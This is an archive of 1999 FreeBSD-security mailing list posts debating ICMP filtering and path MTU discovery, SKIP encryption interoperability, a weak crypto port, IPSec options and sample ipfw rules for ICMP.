incorrect. ICMP is an important part of path MTU discovery (did I say important? I meant critical). You really don't want to block ICMP_UNREACH_NEEDFRAG messages, because it *will* hurt your performance. That's ICMP type 3, subtype 4, for those of you counting. -Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 17:03:34 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA06720 for freebsd-security-outgoing; Sun, 17 Jan 1999 17:03:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from blackie.cruzers.com (cruzers.com [205.215.232.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA06707 for ; Sun, 17 Jan 1999 17:03:31 -0800 (PST) (envelope-from dkulp@board66.cruzers.com) Received: from board66.cruzers.com (board66.cruzers.com [205.215.233.66]) by blackie.cruzers.com (8.8.7/8.8.5) with ESMTP id RAA15881 for ; Sun, 17 Jan 1999 17:15:46 -0800 (PST) Received: (from dkulp@localhost) by board66.cruzers.com (8.8.8/8.7.3) id RAA19385; Sun, 17 Jan 1999 17:03:21 -0800 (PST) Date: Sun, 17 Jan 1999 17:03:21 -0800 (PST) Message-Id: <199901180103.RAA19385@board66.cruzers.com> From: David Kulp MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@FreeBSD.ORG Subject: SKIP algorithm mismatch: FBSD vs Solaris X-Mailer: VM 6.22 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've got a FBSD<-internet->Solaris setup and I'd like to run IP-level encryption between them. I installed skip-1.0 from the FBSD port collection and did a pkgadd of the Solaris skip-1.1 from http://skip.incog.com/. Unfortunately, it seems they don't share any crypto algorithms. Am I out of luck? If so, what non-skip alternatives might I have? thanks! -david. On FreeBSD (Skip 1.0): # skipstat -C Cryptographic algorithms (SKIP version 1): Crypto Module Id: 1 Crypto Name: DES-CBC Crypto Module Id: 10 Crypto Name: simplecrypt Cryptographic algorithms (SKIP): Crypto Module Id: 1 Crypto Name: DES-CBC Crypto Module Id: 2 Crypto Name: DES-EDE-K3 Crypto Module Id: 241 Crypto Name: Safer-128SK-CBC Crypto Module Id: 252 Crypto Name: simplecrypt MAC algorithms (SKIP): MAC Module Id: 1 MAC Name: MD5 On Solaris (Skip 1.1): # skipstat -C Cryptographic algorithms (SKIP version 1): Crypto Module Id: 2 Crypto Name: RC2-40 Crypto Module Id: 3 Crypto Name: RC4-40 Cryptographic algorithms (SKIP): Crypto Module Id: 240 Crypto Name: RC4-40 Crypto Module Id: 242 Crypto Name: RC2-40 MAC algorithms (SKIP): MAC Module Id: 1 MAC Name: MD5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 18:00:00 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA14655 for freebsd-security-outgoing; Sun, 17 Jan 1999 18:00:00 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA14645 for ; Sun, 17 Jan 1999 17:59:56 -0800 (PST) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id RAA24830; Sun, 17 Jan 1999 17:59:22 -0800 (PST) Received: from bubba.whistle.com( 207.76.205.7) by whistle.com via smap (V2.0) id xma024826; Sun, 17 Jan 99 17:58:52 -0800 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id RAA03089; Sun, 17 Jan 1999 17:58:52 -0800 (PST) From: Archie Cobbs Message-Id: <199901180158.RAA03089@bubba.whistle.com> Subject: Re: SKIP algorithm mismatch: FBSD vs Solaris In-Reply-To: <199901180103.RAA19385@board66.cruzers.com> from David Kulp at "Jan 17, 99 05:03:21 pm" To: dkulp@neomorphic.com (David Kulp) Date: Sun, 17 Jan 1999 17:58:52 -0800 (PST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Kulp writes: > I've got a FBSD<-internet->Solaris setup and I'd like to run IP-level > encryption between them. I installed skip-1.0 from the FBSD port > collection and did a pkgadd of the Solaris skip-1.1 from > http://skip.incog.com/. > > Unfortunately, it seems they don't share any crypto algorithms. Am I > out of luck? If so, what non-skip alternatives might I have? A very interesting anti-coincidence. You should try bitching at Sun. If they are completely inflexible then we know they did it on purpose :-) -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 21:13:20 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA16487 for freebsd-security-outgoing; Sun, 17 Jan 1999 21:13:20 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gongshow.masterplan.org (masterplan.powersurfr.com [24.108.38.69]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA16482 for ; Sun, 17 Jan 1999 21:13:19 -0800 (PST) (envelope-from jbg@masterplan.org) Received: from infomat (infomat.precident.com [192.168.4.2]) by gongshow.masterplan.org (8.8.8/8.8.8) with SMTP id WAA23546 for ; Sun, 17 Jan 1999 22:13:13 -0700 (MST) (envelope-from jbg@masterplan.org) Message-Id: <199901180513.WAA23546@gongshow.masterplan.org> From: jbg@masterplan.org (Jason George) To: freebsd-security@FreeBSD.ORG Subject: Re: SKIP algorithm mismatch: FBSD vs Solaris Organization: The Master Plan Always Fails... Date: Mon, 18 Jan 1999 05:14:21 GMT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The Solaris package version is the global version (512-bit) of the SKIP binary, whereas the FreeBSD port is the U.S./Canada version (2048-bit). I ordered the Windows version online a few months ago and downloaded via the Sun website. It only supported the RC2/RC4 algorithms. It took me a full week of persistent bugging to get Sun to tell me that the only way to obtain the 2048-bit version was to have them ship me a copy to a verified North American address. The bottom line is that all of the web-downloadable SKIP binaries are only compiled to run at "global" level encryption strength. I'm quite confident that the $$$ version of Solaris SKIP will support stronger encryption. I'm also confident that if you compiled the Solaris version from scratch, it would support stronger encrytion. Hope this helps. --Jason j.b.georgeieee.org jbgmasterplan.org >I've got a FBSD<-internet->Solaris setup and I'd like to run IP-level >encryption between them. I installed skip-1.0 from the FBSD port >collection and did a pkgadd of the Solaris skip-1.1 from >http://skip.incog.com/. > >Unfortunately, it seems they don't share any crypto algorithms. Am I >out of luck? If so, what non-skip alternatives might I have? > >thanks! >-david. > >On FreeBSD (Skip 1.0): ># skipstat -C > >Cryptographic algorithms (SKIP version 1): >Crypto Module Id: 1 Crypto Name: DES-CBC >Crypto Module Id: 10 Crypto Name: simplecrypt > >Cryptographic algorithms (SKIP): >Crypto Module Id: 1 Crypto Name: DES-CBC >Crypto Module Id: 2 Crypto Name: DES-EDE-K3 >Crypto Module Id: 241 Crypto Name: Safer-128SK-CBC >Crypto Module Id: 252 Crypto Name: simplecrypt > >MAC algorithms (SKIP): >MAC Module Id: 1 MAC Name: MD5 > >On Solaris (Skip 1.1): ># skipstat -C > >Cryptographic algorithms (SKIP version 1): >Crypto Module Id: 2 Crypto Name: RC2-40 >Crypto Module Id: 3 Crypto Name: RC4-40 > >Cryptographic algorithms (SKIP): >Crypto Module Id: 240 Crypto Name: RC4-40 >Crypto Module Id: 242 Crypto Name: RC2-40 > >MAC algorithms (SKIP): >MAC Module Id: 1 MAC Name: MD5 > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 18 01:09:39 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA13758 for freebsd-security-outgoing; Mon, 18 Jan 1999 01:09:39 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.149.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA13753 for ; Mon, 18 Jan 1999 01:09:35 -0800 (PST) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id UAA02014; Mon, 18 Jan 1999 20:08:34 +1100 (EDT) From: Darren Reed Message-Id: <199901180908.UAA02014@cheops.anu.edu.au> Subject: Re: Small Servers - ICMP Redirect To: ck@adsu.bellsouth.com (Christian Kuhtz) Date: Mon, 18 Jan 1999 20:08:33 +1100 (EDT) Cc: dillon@apollo.backplane.com, ck@adsu.bellsouth.com, danny@hilink.com.au, jjwolf@bleeding.com, ben@rosengart.com, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG In-Reply-To: <19990117194706.H97318@oreo.adsu.bellsouth.com> from "Christian Kuhtz" at Jan 17, 99 07:47:06 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Christian Kuhtz, sie said: [...] > Nothing is broken by not getting host unreachable messages. Nothing breaks > by not permitting traceroutes (port unreachable et al). Sure, path MTU > discovery according to RFC1191 is nice, but not vital. Argueably, there are > other much bigger bottlenecks over WANs (at the edge of which firewalls are > typically used) than suboptimal MRUs. [...] Depends on how you define "broken". If you don't mind waiting two minutes for a TCP connection to report "connection timed out" when it could return "network/host unreachable" then sure, stopping ICMP unreachables doesn't break anything. There's also a similar impact on DNS things which operate over the WAN (squid's protocol, DNS, NTP, etc) which can return an error that isn't "connection timed out". Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 18 07:11:29 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA21470 for freebsd-security-outgoing; Mon, 18 Jan 1999 07:11:29 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns.mt.sri.com (sri-gw.MT.net [206.127.105.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA21462 for ; Mon, 18 Jan 1999 07:11:27 -0800 (PST) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id IAA24654; Mon, 18 Jan 1999 08:11:07 -0700 (MST) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id IAA26164; Mon, 18 Jan 1999 08:11:06 -0700 Date: Mon, 18 Jan 1999 08:11:06 -0700 Message-Id: <199901181511.IAA26164@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Christian Kuhtz Cc: Matthew Dillon , "Daniel O'Callaghan" , freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect In-Reply-To: <19990117194706.H97318@oreo.adsu.bellsouth.com> References: <007701be4256$f01ff740$02c3fe90@cisco.com> <19990117185047.A97318@oreo.adsu.bellsouth.com> <199901180030.QAA54407@apollo.backplane.com> <19990117194706.H97318@oreo.adsu.bellsouth.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> ICMP is definitely not just a diagnostic tool, and it is put to >> good use in a properly configured network. For example, Path MTU >> Discovery uses ICMP ( RFC 1191 ). ICMP is not something you want >> to arbitrarily filter. At the very least you want to let through >> the various unreachability messages. > > Nothing is broken by not getting host unreachable messages. Nothing > breaks by not permitting traceroutes (port unreachable et al). Sure, > path MTU discovery according to RFC1191 is nice, but not vital. Hmm, you really don't have a clue, do you? If you break path MTU discovery in your LAN, then you won't get any data to it. Assuming you want to be on the internet, then getting packets is kind of vital. See a recent set of posting I started around the middle of December last year on hackers on why path MTU discovery working is important. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 18 07:19:33 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA22486 for freebsd-security-outgoing; Mon, 18 Jan 1999 07:19:33 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hillbilly.hayseed.net (dnai-207-181-249-194.dsl.dnai.com [207.181.249.194]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA22480 for ; Mon, 18 Jan 1999 07:19:31 -0800 (PST) (envelope-from enkhyl@scient.com) Received: from localhost (IDENT:root@localhost [127.0.0.1]) by hillbilly.hayseed.net (8.9.1/8.8.5) with ESMTP id HAA07131 for ; Mon, 18 Jan 1999 07:19:22 -0800 Date: Mon, 18 Jan 1999 07:18:59 -0800 (PST) From: Christopher Nielsen X-Sender: enkhyl@ender.sf.scient.com Reply-To: Christopher Nielsen To: freebsd-security@FreeBSD.ORG Subject: Port of 'bugs' in ports tree Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poking around in the ports tree this morning, I noticed a port under ports/security called bugs. It caught my attention because pkg/DESCR says it's a crypto library. Having never heard of it, I decided to take a look at it. After perusing the code and reading through the description of the algorithm, I feel very strongly that a warning of some kind should be placed on this piece of software. This is NOT secure in any sense of the word (except possibly against little sisters/brothers). I can think of at least one cryptanalysis attack off the top of my head (poor source of random data), and that's after spending 10 minutes looking at the code and reading the algorithm. Comments? -- Christopher Nielsen Scient: The eBusiness Systems Innovator cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 18 10:30:44 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA15970 for freebsd-security-outgoing; Mon, 18 Jan 1999 10:30:44 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mx1.dmz.fedex.com (mx1.dmz.fedex.com [199.81.194.37]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA15944 for ; Mon, 18 Jan 1999 10:30:28 -0800 (PST) (envelope-from wam@mohawk.dpd.fedex.com) Received: from mx2.zmd.fedex.com (sendmail@mx2.zmd.fedex.com [199.82.159.11]) by mx1.dmz.fedex.com (8.9.1/8.9.1) with ESMTP id MAA23933 for ; Mon, 18 Jan 1999 12:30:22 -0600 (CST) Received: from s07.sa.fedex.com (root@s07.sa.fedex.com [199.81.124.17]) by mx2.zmd.fedex.com (8.9.1/8.9.1) with ESMTP id MAA27849 for ; Mon, 18 Jan 1999 12:30:22 -0600 (CST) Received: from mohawk.dpd.fedex.com (mohawk.dpd.fedex.com [199.81.74.121]) by s07.sa.fedex.com (8.9.1/8.9.1) with SMTP id MAA13084; Mon, 18 Jan 1999 12:30:20 -0600 (CST) Message-Id: <199901181830.MAA13084@s07.sa.fedex.com> To: "Alexander Avanesov" cc: freebsd-security@FreeBSD.ORG Subject: Re: Need help with IPSec Date: Mon, 18 Jan 1999 12:30:20 -0600 From: William McVey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry for the late reply on this. I looked and didn't see an answer to this question come by, so I thought it might still be relevent. "Alexander Avanesov" wrote: >Maybe dummy question, but I want to find a solution. >I have two FreeBSD-2.2.6R connected via RadioEthernet. >So, I want to establish a virtual channel. >My network is look like this: >So, I try to implement a virtual channel between them. >I got a ipsec distribution from www.r4k.net and built it. >A question is: how to setup ipsecadm and rt to get a tunnel? I have no experience with the ipsec implimentation on r4k.net; however, the "official" IPSec port appears to be at www.kame.net (it's the one linked to from the project list page at the FreeBSD website). It's IPSec/IPv6 stack is apparently being integrated into the base OS. I've got it up and running on one of my test systems and it appears promising (a little rough around the edges, but core functionality appears to be there). -- William To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 18 16:07:09 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA06693 for freebsd-security-outgoing; Mon, 18 Jan 1999 16:07:09 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from amon.siol.net (amon.siol.net [193.189.160.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA06686 for ; Mon, 18 Jan 1999 16:07:06 -0800 (PST) (envelope-from tomaz.borstnar@over.net) Received: from hang ([212.30.64.149]) by amon.siol.net (Post.Office MTA v3.5.1 release 219 ID# 620-58654U60000L60000S0V35) with SMTP id net for ; Tue, 19 Jan 1999 01:06:58 +0100 Message-Id: <4.1.19990119010408.02c0d7d0@195.250.206.101> X-Misc: ... X-Mailer: Microsoft-outside-compatible Date: Tue, 19 Jan 1999 01:06:32 +0100 To: freebsd-security@FreeBSD.ORG From: Tomaz Borstnar Subject: ipfw filters for icmp which don't break things - Was: Re: Small Servers - ICMP Redirect In-Reply-To: <199901181511.IAA26164@mt.sri.com> References: <19990117194706.H97318@oreo.adsu.bellsouth.com> <007701be4256$f01ff740$02c3fe90@cisco.com> <19990117185047.A97318@oreo.adsu.bellsouth.com> <199901180030.QAA54407@apollo.backplane.com> <19990117194706.H97318@oreo.adsu.bellsouth.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Would some kind soul provide ipfw filters for icmp with some comments so people can copy them and enable only what they think is useful/needed for them? I'm sure something like this would be good - probably also good for handbook. Tomaz ---- Tomaz Borstnar "Love is the answer to the final question you ask" - Unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 18 16:47:09 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA12265 for freebsd-security-outgoing; Mon, 18 Jan 1999 16:47:09 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA12260 for ; Mon, 18 Jan 1999 16:47:07 -0800 (PST) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id BAA23554; Tue, 19 Jan 1999 01:47:01 +0100 (CET) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id BAA45650; Tue, 19 Jan 1999 01:47:01 +0100 (MET) Date: Tue, 19 Jan 1999 01:47:00 +0100 From: Eivind Eklund To: Christopher Nielsen Cc: freebsd-security@FreeBSD.ORG Subject: Re: Port of 'bugs' in ports tree Message-ID: <19990119014700.D42642@bitbox.follo.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from Christopher Nielsen on Mon, Jan 18, 1999 at 07:18:59AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 18, 1999 at 07:18:59AM -0800, Christopher Nielsen wrote: > Poking around in the ports tree this morning, I noticed a port under > ports/security called bugs. It caught my attention because pkg/DESCR says > it's a crypto library. Having never heard of it, I decided to take a look > at it. > > After perusing the code and reading through the description of the > algorithm, I feel very strongly that a warning of some kind should be > placed on this piece of software. This is NOT secure in any sense of the > word (except possibly against little sisters/brothers). I can think of at > least one cryptanalysis attack off the top of my head (poor source of > random data), and that's after spending 10 minutes looking at the code and > reading the algorithm. If you write up a description of your attack and also submit it to the author, I'll add a link to it from pkg/DESCR. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 18 20:08:04 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA06388 for freebsd-security-outgoing; Mon, 18 Jan 1999 20:08:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from oreo.adsu.bellsouth.com (oreo.adsu.bellsouth.com [205.152.173.36]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA06327 for ; Mon, 18 Jan 1999 20:07:57 -0800 (PST) (envelope-from ck@oreo.adsu.bellsouth.com) Received: (from ck@localhost) by oreo.adsu.bellsouth.com (8.9.1/8.9.1) id XAA06471 for security@freebsd.org; Mon, 18 Jan 1999 23:07:51 -0500 (EST) (envelope-from ck) Date: Mon, 18 Jan 1999 23:07:51 -0500 From: Christian Kuhtz To: security@FreeBSD.ORG Subject: icmp Message-ID: <19990118230751.D5878@oreo.adsu.bellsouth.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate, et al, You are right. If PMTU Discovery actually occurs, filtering ICMP unreachable- need frag does break things. Mea culpa. I had never seen it do that and based on that falsely concluded that it wouldn't be affected, since one almost always got away with it (thanks to widespread Ethernet). Learned a lot about ICMP processing in BSD while reading the sources, though ;). Nonetheless, calling people clueless and whatever else in private flames isn't neccessarily the format I wish this mailing list would take. Particularly since several of us are making attempts in getting corporate backing for FreeBSD development & deployment; my nomex underwear can take it, the guy/gal's with the money might not. Thanks, Chris -- "We are not bound by any concept, we are just bound to make any concept work better than others." -- Dr. Ferry Porsche [Disclaimer: I speak for myself and my views are my own and not in any way to be construed as the views of BellSouth Corporation. ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 18 21:09:08 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA15003 for freebsd-security-outgoing; Mon, 18 Jan 1999 21:09:08 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA14998 for ; Mon, 18 Jan 1999 21:09:05 -0800 (PST) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.2/8.7.3) id AAA11517; Tue, 19 Jan 1999 00:09:02 -0500 (EST) (envelope-from jared) Date: Tue, 19 Jan 1999 00:09:02 -0500 From: Jared Mauch To: Christian Kuhtz Cc: security@FreeBSD.ORG Subject: Re: icmp Message-ID: <19990119000902.A11438@puck.nether.net> Mail-Followup-To: Christian Kuhtz , security@FreeBSD.ORG References: <19990118230751.D5878@oreo.adsu.bellsouth.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <19990118230751.D5878@oreo.adsu.bellsouth.com>; from Christian Kuhtz on Mon, Jan 18, 1999 at 11:07:51PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 18, 1999 at 11:07:51PM -0500, Christian Kuhtz wrote: > > Nate, et al, > > You are right. If PMTU Discovery actually occurs, filtering ICMP unreachable- > need frag does break things. Mea culpa. > > I had never seen it do that and based on that falsely concluded that it > wouldn't be affected, since one almost always got away with it (thanks to > widespread Ethernet). Learned a lot about ICMP processing in BSD while > reading the sources, though ;). Do not fear, this is a common mistake actually, the problem is that it becomes too common. People use filtering icmp as a hack fix in cases to drop traffic that could be DoS or otherwise unrelated. I remember several years ago getting icmp redirects sent halfway across the world from broken routers, and attempted to do a great deal of work to get people to fix them :) What is good is not telling people that "you're an idiot, that breaks stuff", but taking the time to explain why and how it can, and help educate and require your vendors (both in the Free software community, and in the Commerical megabucks world) to comply to them once you've learned why and how these things are in place. We were all without clue once, lets help :) - jared -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 19 03:05:44 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA21395 for freebsd-security-outgoing; Tue, 19 Jan 1999 03:05:44 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.149.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA21389 for ; Tue, 19 Jan 1999 03:05:41 -0800 (PST) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id WAA19295; Tue, 19 Jan 1999 22:05:15 +1100 (EDT) From: Darren Reed Message-Id: <199901191105.WAA19295@cheops.anu.edu.au> Subject: Re: icmp To: ck@adsu.bellsouth.com (Christian Kuhtz) Date: Tue, 19 Jan 1999 22:05:14 +1100 (EDT) Cc: security@FreeBSD.ORG In-Reply-To: <19990118230751.D5878@oreo.adsu.bellsouth.com> from "Christian Kuhtz" at Jan 18, 99 11:07:51 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Before you go, there is one mitigating circumstance with ICMP unreachable messages. On some IP implementations, they can be used to affect a denial of service attack due to mishandling of the error message (it causes open and established connections to be closed). Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 19 06:01:40 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA11790 for freebsd-security-outgoing; Tue, 19 Jan 1999 06:01:40 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from monsoon.dial.pipex.net (monsoon.dial.pipex.net [158.43.128.69]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id GAA11783 for ; Tue, 19 Jan 1999 06:01:38 -0800 (PST) (envelope-from r.yeardley@hunter13.com) Received: (qmail 7447 invoked from network); 19 Jan 1999 14:01:21 -0000 Received: from usern209.uk.uudial.com (HELO rich.hunter13.lan) (193.149.81.242) by smtp.dial.pipex.com with SMTP; 19 Jan 1999 14:01:21 -0000 From: r.yeardley@hunter13.com (Richard Yeardley) To: freebsd-security@FreeBSD.ORG Subject: Re: ipfw filters for icmp which don't break things - Was: Re: Small Servers - ICMP Redirect Date: Tue, 19 Jan 1999 14:04:07 GMT Organization: Hunter 13 Message-ID: <36a59038.350804179@smtp.dial.pipex.com> References: <19990117194706.H97318@oreo.adsu.bellsouth.com> <007701be4256$f01ff740$02c3fe90@cisco.com> <19990117185047.A97318@oreo.adsu.bellsouth.com> <199901180030.QAA54407@apollo.backplane.com> <19990117194706.H97318@oreo.adsu.bellsouth.com> <4.1.19990119010408.02c0d7d0@195.250.206.101> In-Reply-To: <4.1.19990119010408.02c0d7d0@195.250.206.101> X-Mailer: Forte Agent 1.5/32.451 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id GAA11785 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Here's a snippet from my rc.firewall - it allows outgoing pings and traceroutes (and their appropriate return values) but doesn't allow anyone to ping my LAN from the internet. $iif is set to ed0 $oif is set to tun0 # Allow any ICMP packets to pass on inside i/f $fwcmd add pass icmp from any to any via ${iif} # Allow outbound pings $fwcmd add pass icmp from any to any in recv ${oif} icmptypes 0 $fwcmd add pass icmp from any to any out xmit ${oif} icmptypes 8 # Allow outbound traceroutes $fwcmd add pass icmp from any to any in recv ${oif} icmptypes 3 $fwcmd add pass icmp from any to any in recv ${oif} icmptypes 11 On Tue, 19 Jan 1999 01:06:32 +0100, it was written: > >Would some kind soul provide ipfw filters for icmp with some comments so >people can copy them and enable only what they think is useful/needed for >them? I'm sure something like this would be good - probably also good for >handbook. > >Tomaz >---- >Tomaz Borstnar >"Love is the answer to the final question you ask" - Unknown > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 19 06:03:23 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA11949 for freebsd-security-outgoing; Tue, 19 Jan 1999 06:03:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.ucb.crimea.ua (relay.ucb.crimea.ua [212.110.138.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA11323 for ; Tue, 19 Jan 1999 05:56:40 -0800 (PST) (envelope-from ru@ucb.crimea.ua) Received: (from ru@localhost) by relay.ucb.crimea.ua (8.9.2/8.9.2/UCB) id PAA10512; Tue, 19 Jan 1999 15:49:39 +0200 (EET) Date: Tue, 19 Jan 1999 15:49:38 +0200 From: Ruslan Ermilov To: Tomaz Borstnar Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw filters for icmp which don't break things Message-ID: <19990119154938.C6345@ucb.crimea.ua> 